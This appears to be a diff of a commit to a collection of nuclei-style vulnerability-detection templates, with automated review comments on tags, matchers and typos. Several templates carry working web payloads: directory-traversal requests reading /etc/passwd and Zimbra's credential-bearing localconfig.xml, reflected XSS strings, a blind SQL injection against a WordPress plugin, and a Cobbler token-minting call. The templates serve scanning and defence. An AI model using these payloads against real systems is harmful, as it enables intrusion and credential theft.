- https://www.exploit-db.com/exploits/11738
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0972
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
classification:
|
||||
cve-id: CVE-2010-0972
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -1,27 +1,26 @@
|
|||
id: CVE-2010-0982
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_cartweberp - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/10942
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0982
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
classification:
|
||||
cve-id: CVE-2010-0982
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -1,27 +1,26 @@
|
|||
id: CVE-2010-0985
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_abbrev - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/10948
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0985
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
classification:
|
||||
cve-id: CVE-2010-0985
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -1,27 +1,26 @@
|
|||
id: CVE-2010-1056
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_rokdownloads - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11760
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1056
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
classification:
|
||||
cve-id: CVE-2010-1056
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -1,27 +1,26 @@
|
|||
id: CVE-2010-1081
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11511
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1081
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
classification:
|
||||
cve-id: CVE-2010-1081
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -1,27 +1,26 @@
|
|||
id: CVE-2010-1217
|
||||
|
||||
info:
|
||||
name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
|
||||
description: A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11814
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1217
|
||||
tags: cve,cve2010,joomla,lfi,plugin
|
||||
|
||||
classification:
|
||||
cve-id: CVE-2010-1217
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -0,0 +1,34 @@
|
|||
id: CVE-2012-4547
|
||||
|
||||
info:
|
||||
name: AWStats 6.95/7.0 - 'awredir.pl' Cross-Site Scripting
|
||||
author: dhiyaneshDk
|
||||
severity: medium
|
||||
description: AWStats is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/36164
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2012-4547
|
||||
tags: cve,cve2020,xss,awstats
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E'
|
||||
- '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
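Review bot: The tags line carries the wrong year for this template — `tags: cve,cve2020,xss,awstats` under `id: CVE-2012-4547` — so a `-tags cve2012` run skips it and a `cve2020` run wrongly includes it; change it to `tags: cve,cve2012,xss,awstats`. The info block also lacks the `classification:` / `cve-id: CVE-2012-4547` stanza that the other new templates in this commit carry, which the indexer presumably uses; adding it keeps the template DB consistent.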
|
|
@ -0,0 +1,36 @@
|
|||
id: CVE-2013-7091
|
||||
|
||||
info:
|
||||
name: Zimbra Collaboration Server 7.2.2/8.0.2 LFI
|
||||
author: rubina119
|
||||
severity: critical
|
||||
description: Directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2013-7091
|
||||
- https://www.exploit-db.com/exploits/30085
|
||||
- https://www.exploit-db.com/exploits/30472
|
||||
tags: cve,cve2013,zimbra,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00"
|
||||
- "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "zimbra_server_hostname"
|
||||
- "zimbra_ldap_userdn"
|
||||
- "zimbra_ldap_password"
|
||||
- "ldap_postfix_password"
|
||||
- "ldap_amavis_password"
|
||||
- "ldap_nginx_password"
|
||||
- "mysql_root_password"
|
||||
condition: or
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root=.*:0:0"
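Review bot: The regex matcher on the last line, `root=.*:0:0`, can never match /etc/passwd, whose first record has the form `root:x:0:0:`, so the second path (the `etc/passwd%00` probe) has no working matcher at all and only the localconfig.xml probe can ever fire. Change it to `- "root:.*:0:0"`, as the other LFI templates in this commit use. Note also that with `matchers-condition: or` and no status matcher, any page that merely echoes one of the listed config key names would satisfy the word matcher; a `- type: status` / `- 200` guard would tighten this.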
|
|
@ -18,7 +18,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/import–legacy–media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
- "{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/podcast–channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"
|
||||
- "{{BaseURL}}/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/shortcode–ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"
|
||||
- "{{BaseURL}}/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/swipehq–payment–gateway–woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
|
||||
- "{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
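Review bot: The corrected path still ends with a space inside the quotes (`...%3C/script%3E "`), so the request is sent with a trailing space before `HTTP/1.1` or with a stray `%20` appended to the reflected value, which some servers reject and which can stop the body matcher from seeing the exact payload it expects; strip it: `"{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E"`. The matchers this request feeds continue outside the hunk.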
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/ultimate–weather–plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
- "{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/wp–planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
- "{{BaseURL}}/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -5,16 +5,19 @@ info:
|
|||
author: dhiyaneshDK
|
||||
severity: high
|
||||
description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.
|
||||
remediation: Upgrade to a supported version of Gog.
|
||||
reference:
|
||||
- http://www.securityfocus.com/bid/71187
|
||||
- http://seclists.org/fulldisclosure/2014/Nov/33
|
||||
- http://packetstormsecurity.com/files/129117/Gogs-Repository-Search-SQL-Injection.html
|
||||
- http://gogs.io/docs/intro/change_log.html
|
||||
- https://github.com/gogits/gogs/commit/0c5ba4573aecc9eaed669e9431a70a5d9f184b8d
|
||||
- http://www.exploit-db.com/exploits/35238
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/98694
|
||||
- http://www.securityfocus.com/archive/1/533995/100/0/threaded
|
||||
tags: cve,cve2014,sqli,gogs
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cve-id: CVE-2014-8682
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
shodan-query: 'title:"Sign In - Gogs"'
|
||||
|
||||
|
@ -34,3 +37,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/02/04
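Review bot: The new remediation line has a typo and is vaguer than the description two lines above it: `Upgrade to a supported version of Gog.` The description already names the fixed release, so `remediation: Upgrade to Gogs 0.5.6.1105 Beta or later.` is both correct and actionable. The request and matcher block of this template lies between the two hunks and is not visible here.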
|
||||
|
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2016-10940
|
||||
|
||||
info:
|
||||
name: The zm-gallery plugin 1.0 for WordPress SQLI
|
||||
author: cckuailong
|
||||
severity: high
|
||||
description: The zm-gallery plugin 1.0 for WordPress has SQL injection via the order parameter.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/c0cbd314-0f4f-47db-911d-9b2e974bd0f6
|
||||
- https://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-10940
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2016-10940
|
||||
cwe-id: CWE-89
|
||||
tags: cve,cve2016,sqli,wp,wordpress,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
req-condition: true
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body_2, "<th scope=\"row\" class=\"check-column\">")'
|
||||
- '!contains(body_3, "<th scope=\"row\" class=\"check-column\">")'
|
||||
condition: and
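Review bot: The login request is never checked for success, so when `{{username}}`/`{{password}}` are unset or wrong, requests 2 and 3 both land on the login redirect and a failed login is indistinguishable from a not-vulnerable target. Adding `status_code_2 == 200 && status_code_3 == 200` to the DSL makes the differential count only when both admin-page loads actually rendered, and a `remediation:` line would bring this file in line with the other templates in this commit. As a point of style, the `name:` should follow the `<Product> <version> - <Vuln type>` form used by the sibling templates, e.g. `WordPress zm-gallery 1.0 - SQL Injection`.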
|
|
@ -30,3 +30,4 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 500
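Review bot: Adding `- 500` to the accepted status list means a generic server error page now satisfies this matcher as well as a 200, so the template's specificity rests entirely on the sibling matchers in this file, which are outside the hunk and not visible here. If the intent is error-based detection (the injected input provoking a 500 on vulnerable versions), record that above the list, e.g. `# 500: vulnerable versions fail server-side on the injected value`, so a later cleanup does not tighten the list back to 200 alone.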
|
||||
|
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2016-3978
|
||||
|
||||
info:
|
||||
name: FortiOS (Fortinet) - Open Redirect and XSS
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: The Web User Interface (WebUI) in FortiOS 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting (XSS) attacks via the "redirect" parameter to "login."
|
||||
reference:
|
||||
- https://seclists.org/fulldisclosure/2016/Mar/68
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-3978
|
||||
tags: cve,cve2016,redirect,fortinet,fortios
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2016-3978
|
||||
cwe-id: CWE-79
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/login?redir=http://www.example.com'
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
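Review bot: The description and the request disagree on the parameter name: the description says `via the "redirect" parameter to "login."` while the only path sends `/login?redir=http://www.example.com`; since the request is what gets tested, align the description with it after checking the seclists advisory (the NVD text, as far as I recall, also says `redir`). The name promises "Open Redirect and XSS" and the classification says `cwe-id: CWE-79`, but the single matcher only verifies a `Location` header redirect; either add an XSS probe and body matcher, or drop "and XSS" from the name and use `cwe-id: CWE-601`.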
|
|
@ -3,7 +3,7 @@ info:
|
|||
author: Random_Robbie
|
||||
name: Apache Struts2 RCE
|
||||
severity: critical
|
||||
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
|
||||
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker's invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
|
||||
tags: cve,cve2017,struts,rce,apache
|
||||
reference: https://github.com/mazen160/struts-pwn
|
||||
classification:
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2017-7391
|
||||
|
||||
info:
|
||||
name: Magmi – Cross-Site Scripting v.0.7.22
|
||||
name: Magmi Cross-Site Scripting v.0.7.22
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL.
|
||||
|
@ -25,12 +25,13 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- '"><script>alert(document.domain);</script><'
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"><script>alert(document.domain);</script><'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
part: header
|
|
@ -4,7 +4,8 @@ info:
|
|||
name: Apache Struts2 S2-052 RCE
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads.
|
||||
description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type of filtering, which can lead to Remote Code Execution when deserializing XML payloads.
|
||||
remediation: Apply the appropriate patch.
|
||||
reference:
|
||||
- http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html
|
||||
- https://struts.apache.org/docs/s2-052.html
|
||||
|
@ -93,3 +94,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 500
|
||||
|
||||
# Enhanced by mp on 2022/02/04
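Review bot: The reworded description changes the meaning of the sentence: `without any type filtering` is the precise term (XStream's type whitelist was absent), whereas the new `without any type of filtering` reads as a generic claim about all input filtering. Keep the original phrase, or make it explicit: `without any type filtering (no XStream type whitelist)`. The request block of this template is outside the hunk.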
|
||||
|
|
|
@ -0,0 +1,60 @@
|
|||
id: CVE-2018-1000226
|
||||
|
||||
info:
|
||||
name: Cobbler versions 2.6.11+, (2.0.0+ or older versions) - Authentication Bypass
|
||||
author: c-sh0
|
||||
severity: critical
|
||||
reference:
|
||||
- https://github.com/cobbler/cobbler/issues/1916
|
||||
- https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-1000226
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2018-1000226
|
||||
cwe-id: CWE-732
|
||||
tags: cve,cve2018,cobbler,auth-bypass
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST {{BaseURL}}/cobbler_api HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: text/xml
|
||||
|
||||
<?xml version='1.0'?>
|
||||
<methodCall>
|
||||
<methodName>_CobblerXMLRPCInterface__make_token</methodName>
|
||||
<params>
|
||||
<param>
|
||||
<value>
|
||||
<string>cobbler</string>
|
||||
</value>
|
||||
</param>
|
||||
</params>
|
||||
</methodCall>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "Content-Type: text/xml"
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<methodResponse>"
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "!contains(tolower(body), '<name>faultCode</name>')"
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "(.*[a-zA-Z0-9].+==)</string></value>"
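Review bot: The DSL matcher `!contains(tolower(body), '<name>faultCode</name>')` can never fail: the body is lower-cased but the needle keeps the capital C, so an XML-RPC fault response still passes this check and the template's verdict rests on the final regex alone. Use a lower-cased needle, `- "!contains(tolower(body), '<name>faultcode</name>')"`, or drop `tolower`. The closing regex `(.*[a-zA-Z0-9].+==)</string></value>` also assumes the token always ends in `==` padding; if the token length is not fixed, `[A-Za-z0-9+/]+=*</string></value>` is safer — an assumption to verify against Cobbler's make_token implementation.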
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: LG NAS Devices - Remote Code Execution (Unauthenticated)
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter.
|
||||
description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the "password" parameter.
|
||||
reference:
|
||||
- https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
|
||||
- https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: D-Link Routers - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request.
|
||||
description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after "GET /uir" in an HTTP request.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/45678
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-10822
|
||||
|
|
|
@ -10,7 +10,7 @@ info:
|
|||
caused by improper neutralization of special elements.
|
||||
An unauthenticated remote malicious user (or attacker) can supply
|
||||
specially crafted request parameters against Spring Data REST backed HTTP resources
|
||||
or using Spring Data’s projection-based request payload binding hat can lead to a remote code execution attack.
|
||||
or using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-1273
|
||||
tags: cve,cve2018,vmware,rce,spring
|
||||
classification:
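Review bot: The new line still carries the typo `binding hat can lead`; it should read `or using Spring Data's projection-based request payload binding that can lead to a remote code execution attack.` The change only swapped the curly apostrophe. The description block this line belongs to begins outside the hunk.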
|
||||
|
|
|
@ -2,34 +2,38 @@ id: CVE-2018-13380
|
|||
|
||||
info:
|
||||
name: Fortinet FortiOS Cross-Site Scripting
|
||||
author: shelld3v
|
||||
author: shelld3v,AaronChen0
|
||||
severity: medium
|
||||
description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-13380
|
||||
tags: cve,cve2018,fortios,xss,fortinet
|
||||
reference:
|
||||
